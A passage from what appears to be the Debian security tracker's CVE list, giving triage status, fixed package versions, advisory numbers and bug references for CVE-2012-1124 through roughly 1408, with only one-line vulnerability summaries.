	NOT-FOR-US: Tiny Password
CVE-2012-1408 (Unspecified vulnerability in the App Lock (com.cc.applock) application ...)
	NOT-FOR-US: App Lock
CVE-2012-1407 (Unspecified vulnerability in the GO Message Widget ...)
	NOT-FOR-US: GO Message Widget
CVE-2012-1406 (Unspecified vulnerability in the GO Bookmark Widget ...)
	NOT-FOR-US: GO Bookmark Widget
CVE-2012-1405 (Unspecified vulnerability in the GO Note Widget ...)
	NOT-FOR-US: GO Note Widget
CVE-2012-1404 (Unspecified vulnerability in the Dolphin Browser Mini ...)
	NOT-FOR-US: Dolphin Browser Mini
CVE-2012-1403 (Unspecified vulnerability in the Dolphin Browser CN ...)
	NOT-FOR-US: Dolphin Browser CN
CVE-2012-1402 (Unspecified vulnerability in the QianXun YingShi (com.qianxun.yingshi) ...)
	NOT-FOR-US: QianXun YingShi
CVE-2012-1401 (Unspecified vulnerability in the CamScanner (com.intsig.camscanner) ...)
	NOT-FOR-US: CamScanner
CVE-2012-1400 (Unspecified vulnerability in the U+Box 2.0 Pad (lg.uplusbox.pad) ...)
	NOT-FOR-US: U+Box
CVE-2012-1399 (Unspecified vulnerability in the U+Box 2.0 (lg.uplusbox) application ...)
	NOT-FOR-US: U+Box
CVE-2012-1398 (Unspecified vulnerability in the GO WeiboWidget ...)
	NOT-FOR-US: GO WeiboWidget
CVE-2012-1397 (Unspecified vulnerability in the GO QQWeiboWidget ...)
	NOT-FOR-US: GO QQWeiboWidget
CVE-2012-1396 (Unspecified vulnerability in the GO FBWidget ...)
	NOT-FOR-US: GO FBWidget
CVE-2012-1395 (Unspecified vulnerability in the GO TwiWidget ...)
	NOT-FOR-US: GO TwiWidget
CVE-2012-1394 (Unspecified vulnerability in the GO Email Widget ...)
	NOT-FOR-US: GO Email Widget
CVE-2012-1393 (Unspecified vulnerability in the GO SMS Pro (com.jb.gosms) application ...)
	NOT-FOR-US: GO SMS Pro
CVE-2012-1392 (Unspecified vulnerability in the Dolphin Browser HD ...)
	NOT-FOR-US: Dolphin Browser HD
CVE-2012-1391 (Unspecified vulnerability in the mOffice - Outlook sync ...)
	NOT-FOR-US: mOffice - Outlook sync
CVE-2012-1390 (Unspecified vulnerability in the Miso (com.bazaarlabs.miso) ...)
	NOT-FOR-US: Miso
CVE-2012-1389 (Unspecified vulnerability in the Di Long Weibo (com.icekirin.weibos) ...)
	NOT-FOR-US: Di Long Weibo
CVE-2012-1388 (Unspecified vulnerability in the XiXunTianTian (com.xixun.tiantian) ...)
	NOT-FOR-US: XiXunTianTian
CVE-2012-1387 (Unspecified vulnerability in the RealTalk (com.tmsmanager.tms) ...)
	NOT-FOR-US: RealTalk
CVE-2012-1386 (Unspecified vulnerability in the YouMail Visual Voicemail Plus ...)
	NOT-FOR-US: YouMail Visual Voicemail Plus
CVE-2012-1385 (Unspecified vulnerability in the NetEase WeiboHD (com.netease.wbhd) ...)
	NOT-FOR-US: NetEase WeiboHD
CVE-2012-1384 (Unspecified vulnerability in the NetEase Pmail (com.netease.rpmms) ...)
	NOT-FOR-US: NetEase Pmail
CVE-2012-1383 (Unspecified vulnerability in the NetEase Reader (com.netease.pris) ...)
	NOT-FOR-US: NetEase Reader
CVE-2012-1382 (Unspecified vulnerability in the Youdao Dictionary (com.youdao.dict) ...)
	NOT-FOR-US: Youdao Dictionary
CVE-2012-1381 (Unspecified vulnerability in the NetEase CloudAlbum ...)
	NOT-FOR-US: NetEase CloudAlbum
CVE-2012-1380 (Unspecified vulnerability in the NetEaseWeibo (com.netease.wb) ...)
	NOT-FOR-US: NetEaseWeibo
CVE-2012-1379
	RESERVED
CVE-2012-1378
	RESERVED
CVE-2012-1377
	RESERVED
CVE-2012-1376
	RESERVED
CVE-2012-1375
	RESERVED
CVE-2012-1374
	RESERVED
CVE-2012-1373
	RESERVED
CVE-2012-1372
	RESERVED
CVE-2012-1371
	RESERVED
CVE-2012-1370 (Cisco AnyConnect Secure Mobility Client 3.0 before 3.0.08057 allows ...)
	NOT-FOR-US: Cisco
CVE-2012-1369
	RESERVED
CVE-2012-1368
	RESERVED
CVE-2012-1367 (The MallocLite implementation in Cisco IOS 12.0, 12.2, 15.0, 15.1, and ...)
	NOT-FOR-US: Cisco
CVE-2012-1366
	RESERVED
CVE-2012-1365 (Cisco Unified Computing System (UCS) 1.4 and 2.0 allows remote ...)
	NOT-FOR-US: Cisco
CVE-2012-1364 (Cisco Unified Computing System (UCS) 1.4 and 2.0 allows remote ...)
	NOT-FOR-US: Cisco
CVE-2012-1363
	RESERVED
CVE-2012-1362
	RESERVED
CVE-2012-1361 (Cisco IOS 15.1 and 15.2, when the Multicast Music-on-Hold (MMoH) ...)
	NOT-FOR-US: Cisco
CVE-2012-1360
	RESERVED
CVE-2012-1359
	RESERVED
CVE-2012-1358
	RESERVED
CVE-2012-1357 (The igmp_snoop_orib_fill_source_update function in the IGMP process in ...)
	NOT-FOR-US: NX-OS
CVE-2012-1356
	RESERVED
CVE-2012-1355
	RESERVED
CVE-2012-1354
	RESERVED
CVE-2012-1353
	RESERVED
CVE-2012-1352
	RESERVED
CVE-2012-1351
	RESERVED
CVE-2012-1350 (Cisco IOS 12.3 and 12.4 on Aironet access points allows remote ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-1349
	RESERVED
CVE-2012-1348 (Cisco Wide Area Application Services (WAAS) appliances with software ...)
	NOT-FOR-US: Cisco Wide Area Application Services
CVE-2012-1347
	RESERVED
CVE-2012-1346 (Cisco Emergency Responder 8.6 and 9.2 allows remote attackers to cause ...)
	NOT-FOR-US: Cisco Emergency Responder
CVE-2012-1345
	RESERVED
CVE-2012-1344 (Cisco IOS 15.1 and 15.2, when a clientless SSL VPN is configured, ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-1343
	RESERVED
CVE-2012-1342 (Cisco Carrier Routing System (CRS) 3.9, 4.0, and 4.1 allows remote ...)
	NOT-FOR-US: Cisco Carrier Routing System
CVE-2012-1341
	RESERVED
CVE-2012-1340 (The Fibre Channel over IP (FCIP) implementation in Cisco MDS NX-OS 4.2 ...)
	NOT-FOR-US: Cisco MDS NX-OS
CVE-2012-1339 (The Fabric Interconnect component in Cisco Unified Computing System ...)
	NOT-FOR-US: Cisco Unified Computing System
CVE-2012-1338 (Cisco IOS 15.0 and 15.1 on Catalyst 3560 and 3750 series switches ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-1337 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L ...)
	NOT-FOR-US: Cisco WebEx
CVE-2012-1336 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L ...)
	NOT-FOR-US: Cisco WebEx
CVE-2012-1335 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L ...)
	NOT-FOR-US: Cisco WebEx
CVE-2012-1334
	RESERVED
CVE-2012-1333
	RESERVED
CVE-2012-1332
	RESERVED
CVE-2012-1331
	RESERVED
CVE-2012-1330
	RESERVED
CVE-2012-1329
	RESERVED
CVE-2012-1328 (Cisco Unified IP Phones 9900 series devices with firmware 9.1 and 9.2 ...)
	NOT-FOR-US: Cisco IP Phone
CVE-2012-1327 (dot11t/t_if_dot11_hal_ath.c in Cisco IOS 12.3, 12.4, 15.0, and 15.1 ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-1326
	RESERVED
CVE-2012-1325
	RESERVED
CVE-2012-1324 (Race condition in the Zone-Based Firewall in Cisco IOS 15.1 and 15.2, ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-1323
	RESERVED
CVE-2012-1322
	RESERVED
CVE-2012-1321
	RESERVED
CVE-2012-1320
	RESERVED
CVE-2012-1319
	RESERVED
CVE-2012-1318
	RESERVED
CVE-2012-1317
	RESERVED
CVE-2012-1316
	RESERVED
CVE-2012-1315 (Memory leak in the SIP inspection feature in the Zone-Based Firewall ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-1314 (The WAAS Express feature in Cisco IOS 15.1 and 15.2 allows remote ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-1313
	RESERVED
CVE-2012-1312 (The MACE feature in Cisco IOS 15.1 and 15.2 allows remote attackers to ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-1311 (The RSVP feature in Cisco IOS 15.0 and 15.1 and IOS XE 3.2.xS through ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-1310 (Memory leak in the Zone-Based Firewall in Cisco IOS 12.4, 15.0, 15.1, ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-1309
	RESERVED
CVE-2012-1308 (Cross-site request forgery (CSRF) vulnerability in redpass.cgi in ...)
	NOT-FOR-US: D-Link
CVE-2012-1307
	RESERVED
CVE-2012-1306
	RESERVED
CVE-2012-1305
	RESERVED
CVE-2012-1304
	RESERVED
CVE-2012-1303
	RESERVED
CVE-2012-1302
	RESERVED
CVE-2012-1301
	RESERVED
	NOT-FOR-US: Umbraco
CVE-2012-1300
	RESERVED
CVE-2012-1299
	RESERVED
CVE-2012-1298
	RESERVED
CVE-2012-1297 (Multiple cross-site request forgery (CSRF) vulnerabilities in main.php ...)
	NOT-FOR-US: Contao
CVE-2012-1296 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Elefant CMS
CVE-2012-1295
	RESERVED
CVE-2012-1294 (SQL injection vulnerability in CONTIMEX Impulsio CMS allows remote ...)
	NOT-FOR-US: CONTIMEX Impulsio CMS
CVE-2012-1292 (Unspecified vulnerability in the MessagingSystem servlet in SAP ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2012-1291 (Unspecified vulnerability in the ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2012-1290 (Cross-site scripting (XSS) vulnerability in b2b/auction/container.jsp ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2012-1289 (Multiple directory traversal vulnerabilities in SAP NetWeaver 7.0 ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2012-1293 (Multiple cross-site scripting (XSS) vulnerabilities in fup in Frams' ...)
	{DSA-2414-1}
	- fex 20120215-1 (low; bug #660621)
CVE-2012-1288 (The UTC Fire & Security GE-MC100-NTP/GPS-ZB Master Clock device uses ...)
	NOT-FOR-US: UTC Fire & Security GE-MC100-NTP/GPS-ZB Master Clock
CVE-2012-1287
	RESERVED
CVE-2012-1286
	RESERVED
CVE-2012-1285
	RESERVED
CVE-2012-1284
	RESERVED
CVE-2012-1283
	RESERVED
CVE-2012-1282
	RESERVED
CVE-2012-1281
	RESERVED
CVE-2012-1280
	RESERVED
CVE-2012-1279
	RESERVED
CVE-2012-1278
	RESERVED
CVE-2012-1277
	RESERVED
CVE-2012-1276
	RESERVED
CVE-2012-1275
	RESERVED
CVE-2012-1274
	RESERVED
CVE-2012-1273
	RESERVED
CVE-2012-1272
	RESERVED
CVE-2012-1271
	RESERVED
CVE-2012-1270
	RESERVED
CVE-2012-1269
	RESERVED
CVE-2012-1268
	RESERVED
CVE-2012-1267
	RESERVED
CVE-2012-1266
	RESERVED
CVE-2012-1265
	RESERVED
CVE-2012-1264 (Unspecified vulnerability in Gretech GOM Media Player before ...)
	NOT-FOR-US: Gretech GOM Media Player
CVE-2012-1263
	RESERVED
CVE-2012-1262 (Cross-site scripting (XSS) vulnerability in cgi-bin/mt/mt-wizard.cgi ...)
	{DSA-2423-1}
	- movabletype-opensource 5.1.3+dfsg-1
CVE-2012-1261
	RESERVED
CVE-2012-1260
	RESERVED
CVE-2012-1259
	RESERVED
CVE-2012-1258
	RESERVED
CVE-2012-1257
	RESERVED
	- pidgin (unimportant)
	NOTE: Negligible local information disclosure
CVE-2012-1256 (The single sign-on (SSO) implementation in EasyVista before ...)
	NOT-FOR-US: EasyVista
CVE-2012-1255 (SQL injection vulnerability in Segue 2.2.10.2 and earlier allows ...)
	NOT-FOR-US: Segue (CMS)
CVE-2012-1254 (Cross-site scripting (XSS) vulnerability in Segue 2.2.10.2 and earlier ...)
	NOT-FOR-US: Segue (CMS)
CVE-2012-1253 (Cross-site scripting (XSS) vulnerability in Roundcube Webmail before ...)
	- roundcube 0.7-1
CVE-2012-1252 (Cross-site scripting (XSS) vulnerability in RSSOwl before 2.1.1 allows ...)
	- rssowl (bug #346541)
CVE-2012-1251 (Opera before 9.63 does not properly verify X.509 certificates from SSL ...)
	NOT-FOR-US: Opera
CVE-2012-1250 (Logitec LAN-W300N/R routers with firmware before 2.27 do not properly ...)
	NOT-FOR-US: Logitec LAN-W300N/R device
CVE-2012-1249 (The iLunascape application 1.0.4.0 and earlier for Android does not ...)
	NOT-FOR-US: iLunascape
CVE-2012-1248 (app/config/core.php in baserCMS 1.6.15 and earlier does not properly ...)
	NOT-FOR-US: BaserCMS
CVE-2012-1247 (Cross-site scripting (XSS) vulnerability in KENT-WEB WEB MART 1.7 and ...)
	NOT-FOR-US: KENT-WEB WEB MART
CVE-2012-1246 (Cross-site scripting (XSS) vulnerability in KENT-WEB WEB MART 1.7 and ...)
	NOT-FOR-US: KENT-WEB WEB MART
CVE-2012-1245 (Cross-site scripting (XSS) vulnerability in the cleanup_urls function ...)
	NOT-FOR-US: OSQA
CVE-2012-1244 (The NTT DOCOMO sp mode mail application 5400 and earlier for Android ...)
	NOT-FOR-US: Android app
CVE-2012-1243 (The TwitRocker2 application before 1.0.23 for Android does not ...)
	NOT-FOR-US: Android app
CVE-2012-1242 (Untrusted search path vulnerability in JustSystems Ichitaro 2011 Sou, ...)
	NOT-FOR-US: various Ichitaro products
CVE-2012-1241 (GRScript18.dll before 1.2.2.0 in ActiveScriptRuby (ASR) before 1.8.7 ...)
	NOT-FOR-US: ActiveScriptRuby
CVE-2012-1240 (Cross-site scripting (XSS) vulnerability in the RECRUIT Dokodemo ...)
	NOT-FOR-US: RECRUIT Dokodemo
CVE-2012-1239 (The TopAccess web-based management interface on TOSHIBA TEC e-Studio ...)
	NOT-FOR-US: TOSHIBA TEC e-Studio
CVE-2012-1238 (Session fixation vulnerability in SENCHA SNS before 1.0.2 allows ...)
	NOT-FOR-US: SENCHA SNS
CVE-2012-1237 (Cross-site request forgery (CSRF) vulnerability in SENCHA SNS before ...)
	NOT-FOR-US: SENCHA SNS
CVE-2012-1236 (Multiple cross-site request forgery (CSRF) vulnerabilities in Janetter ...)
	NOT-FOR-US: Janetter
CVE-2012-1235 (Cross-site request forgery (CSRF) vulnerability in Advantech/BroadWin ...)
	NOT-FOR-US: Advantech/BroadWin WebAccess
CVE-2012-1234 (SQL injection vulnerability in Advantech/BroadWin WebAccess 7.0 allows ...)
	NOT-FOR-US: Advantech/BroadWin WebAccess
CVE-2012-1233
	RESERVED
CVE-2012-1232
	RESERVED
CVE-2012-1231
	RESERVED
CVE-2012-1230
	RESERVED
CVE-2012-1229
	RESERVED
CVE-2012-1228
	RESERVED
CVE-2012-1227 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...)
	NOT-FOR-US: pluck
CVE-2012-1226 (Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 ...)
	- dolibarr (bug #634783)
CVE-2012-1225 (Multiple SQL injection vulnerabilities in Dolibarr CMS 3.2.0 Alpha and ...)
	- dolibarr (bug #634783)
CVE-2012-1224 (Cross-site scripting (XSS) vulnerability in system/classes/login.php ...)
	NOT-FOR-US: ContentLion Alpha
CVE-2012-1223 (RabidHamster R2/Extreme 1.65 and earlier uses a small search space of ...)
	NOT-FOR-US: RabidHamster
CVE-2012-1222 (Stack-based buffer overflow in RabidHamster R2/Extreme 1.65 and ...)
	NOT-FOR-US: RabidHamster
CVE-2012-1221 (Directory traversal vulnerability in the telnet server in RabidHamster ...)
	NOT-FOR-US: RabidHamster
CVE-2012-1220 (Cross-site request forgery (CSRF) vulnerability in ...)
	NOT-FOR-US: GAzie
CVE-2012-1219 (Multiple cross-site scripting (XSS) vulnerabilities in freelancerKit ...)
	NOT-FOR-US: freelancerKit
CVE-2012-1218 (Multiple SQL injection vulnerabilities in freelancerKit 2.35 allow ...)
	NOT-FOR-US: freelancerKit
CVE-2012-1217 (Multiple cross-site scripting (XSS) vulnerabilities in STHS v2 Web ...)
NOT-FOR-US: STHS CVE-2012-1216 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: PBBoard CVE-2012-1215 (Cross-site scripting (XSS) vulnerability in the Add friends module in ...) NOT-FOR-US: Yoono extension CVE-2012-1214 (Cross-site scripting (XSS) vulnerability in the Add friends module in ...) NOT-FOR-US: Yoono Desktop Application CVE-2012-1213 (Cross-site scripting (XSS) vulnerability in zimbra/h/calendar in ...) NOT-FOR-US: Zimbra Web Client CVE-2012-1212 (Cross-site scripting (XSS) vulnerability in the smwfOnSfSetTargetName ...) NOT-FOR-US: Semantic Enterprise Wiki CVE-2012-1211 (Cross-site scripting (XSS) vulnerability in pfile/kommentar.php in ...) NOT-FOR-US: Powie pFile CVE-2012-1210 (SQL injection vulnerability in pfile/file.php in Powie pFile 1.02 ...) NOT-FOR-US: Powie pFile CVE-2012-1209 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Fork CMS CVE-2012-1208 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Fork CMS CVE-2012-1207 (Directory traversal vulnerability in ...) NOT-FOR-US: Fork CMS CVE-2012-1206 (Multiple integer overflows in Hancom Office 2010 SE 8.5.5 allow remote ...) NOT-FOR-US: Hancom Office CVE-2012-1205 (PHP remote file inclusion vulnerability in relocate-upload.php in ...) NOT-FOR-US: Relocate Upload plugin CVE-2012-1204 RESERVED CVE-2012-1203 RESERVED CVE-2012-1202 RESERVED CVE-2012-1201 RESERVED CVE-2012-1200 (Multiple PHP remote file inclusion vulnerabilities in Nova CMS allow ...) NOT-FOR-US: Nova CMS CVE-2012-1199 (Multiple PHP remote file inclusion vulnerabilities in Basic Analysis ...) - acidbase (low) [squeeze] - acidbase (Minor issue) CVE-2012-1198 (base_ag_main.php in Basic Analysis and Security Engine (BASE) 1.4.5 ...) - acidbase (low; bug #661020) [squeeze] - acidbase (Minor issue) CVE-2012-1197 (Integer overflow in the IDE_ACDStd.apl module for ACDSee 14.1 Build ...) 
NOT-FOR-US: ACDSee CVE-2012-1196 (Directory traversal vulnerability in the VulCore web service ...) NOT-FOR-US: Lenovo ThinkManagement Console CVE-2012-1195 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: Lenovo ThinkManagement Console CVE-2012-1194 (The resolver in the DNS Server service in Microsoft Windows Server ...) NOTE: DNS protocol flaw CVE-2012-1193 (The resolver in PowerDNS Recursor (aka pdns_recursor) 3.3 overwrites ...) NOTE: DNS protocol flaw CVE-2012-1192 (The resolver in Unbound before 1.4.11 overwrites cached server names ...) NOTE: DNS protocol flaw CVE-2012-1191 (The resolver in dnscache in Daniel J. Bernstein djbdns 1.05 overwrites ...) - djbdns NOTE: DNS protocol flaw NOTE: RH made an update: https://bugzilla.redhat.com/show_bug.cgi?id=838761 CVE-2011-5081 (Cross-site scripting (XSS) vulnerability in RestoreFile.pm in BackupPC ...) - backuppc 3.1.0-9.1 (low; bug #661011) [squeeze] - backuppc 3.1.0-9.1 [lenny] - backuppc (Minor issue) CVE-2012-0869 (Cross-site scripting (XSS) vulnerability in fup in Frams' Fast File ...) {DSA-2414-1} - fex 20120215-1 (low; bug #660621) CVE-2012-1190 (Cross-site scripting (XSS) vulnerability in the replication-setup ...) - phpmyadmin 4:3.4.10.1-1 (unimportant) [lenny] - phpmyadmin [squeeze] - phpmyadmin NOTE: hypothetical issue CVE-2012-1189 (Stack-based buffer overflow in modules/graphic/ssgraph/grsound.cpp in ...) - torcs 1.3.3-1 (low; bug #660555) [squeeze] - torcs (Minor issue) - speed-dreams (bug #599884) CVE-2012-1188 (Multiple cross-site scripting (XSS) vulnerabilities in Fork CMS before ...) NOT-FOR-US: Fork CMS CVE-2012-1187 RESERVED - bitlbee 3.0.4+bzr855-1 (low) [squeeze] - bitlbee (Minor issue) CVE-2012-1186 (Integer overflow in the SyncImageProfiles function in profile.c in ...) {DSA-2462-1} - imagemagick 8:6.6.9.7-7 (bug #665007) CVE-2012-1185 (Multiple integer overflows in (1) magick/profile.c or (2) ...) 
{DSA-2462-1} - imagemagick 8:6.6.9.7-7 (bug #665007) CVE-2012-1184 (Stack-based buffer overflow in the ast_parse_digest function in ...) - asterisk 1:1.8.10.0~dfsg-1 (bug #664411) [squeeze] - asterisk (HTTP digest authentication code not present) NOTE: http://www.openwall.com/lists/oss-security/2012/03/16/10 CVE-2012-1183 (Stack-based buffer overflow in the milliwatt_generate function in the ...) {DSA-2460-1} - asterisk 1:1.8.10.0~dfsg-1 (bug #664411) NOTE: http://www.openwall.com/lists/oss-security/2012/03/16/10 CVE-2012-1182 (The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before ...) {DSA-2450-1} - samba 2:3.6.4-1 (bug #668309) - samba4 4.0.0~alpha19+dfsg1-1 (bug #668309) CVE-2012-1181 (fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP ...) {DSA-2436-1} - libapache2-mod-fcgid 1:2.3.6-1.1 (bug #615814) CVE-2012-1180 (Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before ...) {DSA-2434-1} - nginx 1.1.17-1 (bug #664137) NOTE: http://seclists.org/oss-sec/2012/q1/644 CVE-2012-1179 (The Linux kernel before 3.3.1, when KVM is used, allows guest OS users ...) - linux-2.6 3.2.14-1 [squeeze] - linux-2.6 (Vulnerable code not present) CVE-2012-1178 (The msn_oim_report_to_user function in oim.c in the MSN protocol ...) - pidgin 2.10.2-1 (low; bug #664030) [squeeze] - pidgin (Only exploitable by malicious server) NOTE: http://pidgin.im/news/security/?id=61 CVE-2012-1177 (libgdata before 0.10.2 and 0.11.x before 0.11.1 does not validate SSL ...) {DSA-2482-1} - libgdata 0.10.2-1 (bug #664032) NOTE: http://www.openwall.com/lists/oss-security/2012/03/14/3 CVE-2012-1176 (Buffer overflow in the fribidi_utf8_to_unicode function in PyFriBidi ...) - pyfribidi 0.11.0-1 (bug #663189) [squeeze] - pyfribidi (Minor issue) CVE-2012-1175 (Integer overflow in the GnashImage::size method in ...) 
{DSA-2435-1} - gnash 0.8.10-5 (bug #664023) NOTE: http://www.openwall.com/lists/oss-security/2012/03/14/5 CVE-2012-1174 (The rm_rf_children function in util.c in the systemd-logind login ...) - systemd 44-1 (bug #664364) CVE-2012-1173 (Multiple integer overflows in tiff_getimage.c in LibTIFF 3.9.4 allow ...) {DSA-2447-1} - tiff3 3.9.6-2 - tiff 4.0.1-2 CVE-2012-1172 (The file-upload implementation in rfc1867.c in PHP before 5.4.0 does ...) {DSA-2465-1} - php5 5.4.0-1 (bug #663760) CVE-2012-1171 [safemode bypass after RSHUTDOWN] RESERVED - php5 (unimportant) NOTE: according to php's security statement, safemode bypass issues are not treated as security-relevant CVE-2012-1170 RESERVED - moodle (Only affects 2.2) CVE-2012-1169 RESERVED - moodle (Only affects 2.0 to 2.2) CVE-2012-1168 RESERVED - moodle (Only affects 2.0 to 2.2) CVE-2012-1167 (The JBoss Server in JBoss Enterprise Application Platform 5.1.x before ...) - jbossas4 (Only builds a few libraries, not the full application server) CVE-2012-1166 [ldm (LTSP display manager)] RESERVED - ldm 2:2.2.7-1 (bug #663645) [squeeze] - ldm (Introduced in 2.2) NOTE: https://bugs.launchpad.net/ubuntu/+source/ldm/+bug/953340 CVE-2012-1165 (The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL ...) {DSA-2454-1} - openssl 1.0.0h-1 (low; bug #663642) NOTE: http://www.openwall.com/lists/oss-security/2012/03/12/3 CVE-2012-1164 (slapd in OpenLDAP before 2.4.30 allows remote attackers to cause a ...) - openldap 2.4.31-1 (low; bug #663644) [squeeze] - openldap (Minor issue) NOTE: http://www.openwall.com/lists/oss-security/2012/03/12/4 CVE-2012-1163 (Integer overflow in the _zip_readcdir function in zip_open.c in libzip ...) - libzip 0.10.1-1 (bug #664990) CVE-2012-1162 (Heap-based buffer overflow in the _zip_readcdir function in zip_open.c ...) 
- libzip 0.10.1-1 (bug #664990) CVE-2012-1161 RESERVED - moodle (Only affects 2.1 to 2.2) CVE-2012-1160 RESERVED - moodle (Only affects 2.1 to 2.2) CVE-2012-1159 RESERVED - moodle (Only affects 2.1 to 2.2) CVE-2012-1158 RESERVED - moodle (Only affects 2.1 to 2.2) CVE-2012-1157 RESERVED - moodle (Only affects 2.0 to 2.2) CVE-2012-1156 RESERVED - moodle (Only affects 2.0 to 2.2) CVE-2012-1155 RESERVED - moodle 1.9.9.dfsg2-6 (low; bug #668411) [squeeze] - moodle 1.9.9.dfsg2-2.1+squeeze4 CVE-2012-1154 (mod_cluster 1.0.10 before 1.0.10 CP03 and 1.1.x before 1.1.4, as used ...) NOT-FOR-US: mod_cluster CVE-2012-1153 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: AppRain CMS, not in Debian CVE-2012-1152 (Multiple format string vulnerabilities in the error reporting ...) {DSA-2432-1} - libyaml-libyaml-perl 0.38-2 (bug #661548) CVE-2012-1151 (Multiple format string vulnerabilities in dbdimp.c in DBD::Pg (aka ...) {DSA-2431-1} - libdbd-pg-perl 2.19.0-1 (bug #661536) CVE-2012-1150 (Python before 2.6.8, 2.7.x before 2.7.3, 3.x before 3.1.5, and 3.2.x ...) - python2.5 (low) - python2.6 2.6.8-0.1 (low) - python2.7 2.7.3~rc1-1 (low) - python3.2 3.2.3-1 (low) - python3.1 (low) [squeeze] - python2.5 (Minor issue) [squeeze] - python2.6 (Minor issue) [squeeze] - python3.1 (Minor issue) CVE-2012-1149 (Integer overflow in the vclmi.dll module in OpenOffice.org (OOo) 3.3, ...) {DSA-2487-1 DSA-2473-1} - libreoffice 1:3.4.5-1 - openoffice.org 1:3.3.0-1 NOTE: Since 3.3.0 openoffice.org is a transitional source package to migrate to libreoffice CVE-2012-1148 (Memory leak in the poolGrow function in expat/lib/xmlparse.c in expat ...) {DSA-2525-1} - xmlrpc-c 1.16.33-3.2 (low; bug #687672) [squeeze] - xmlrpc-c (Minor issue) - expat 2.1.0~beta3-1 (bug #663579) CVE-2012-1147 (readfilemap.c in expat before 2.1.0 allows context-dependent attackers ...) - expat (readfilemap.c is not used in *IX) CVE-2012-1146 (The mem_cgroup_usage_unregister_event function in mm/memcontrol.c in ...) 
- linux-2.6 3.2.10-1 (low) [squeeze] - linux-2.6 (Vulnerable code not present) CVE-2012-1145 (spacewalk-backend in Red Hat Network Satellite 5.4 on Red Hat ...) NOT-FOR-US: RHN Satellite CVE-2012-1144 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) {DSA-2428-1} - freetype 2.4.9-1 (bug #662864) CVE-2012-1143 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1142 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) {DSA-2428-1} - freetype 2.4.9-1 (bug #662864) CVE-2012-1141 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1140 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1139 (Array index error in FreeType before 2.4.9, as used in Mozilla Firefox ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1138 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1137 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1136 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) {DSA-2428-1} - freetype 2.4.9-1 (bug #662864) CVE-2012-1135 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1134 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) {DSA-2428-1} - freetype 2.4.9-1 (bug #662864) CVE-2012-1133 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) 
{DSA-2428-1} - freetype 2.4.9-1 (bug #662864) CVE-2012-1132 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1131 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1130 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1129 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1128 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1127 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1126 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1125 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: Kish Guest Posting Plugin for WordPress (not in Debian) CVE-2012-1124 RESERVED 